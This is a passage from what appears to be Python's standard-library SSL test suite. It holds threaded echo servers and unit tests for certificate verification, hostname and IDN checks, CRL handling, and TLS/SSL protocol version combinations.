self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
elif stripped == b'VERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_verified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
elif stripped == b'UNVERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_unverified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(1.0)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError as e:
if support.verbose:
sys.stdout.write(f' connection timeout {e!r}\n')
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.close()
def close(self):
if self.sock is not None:
self.sock.close()
self.sock = None
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(
ssl.SSLError,
'alert unknown ca|EOF occurred'
):
# TLS 1.3 perform client cert exchange after handshake
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
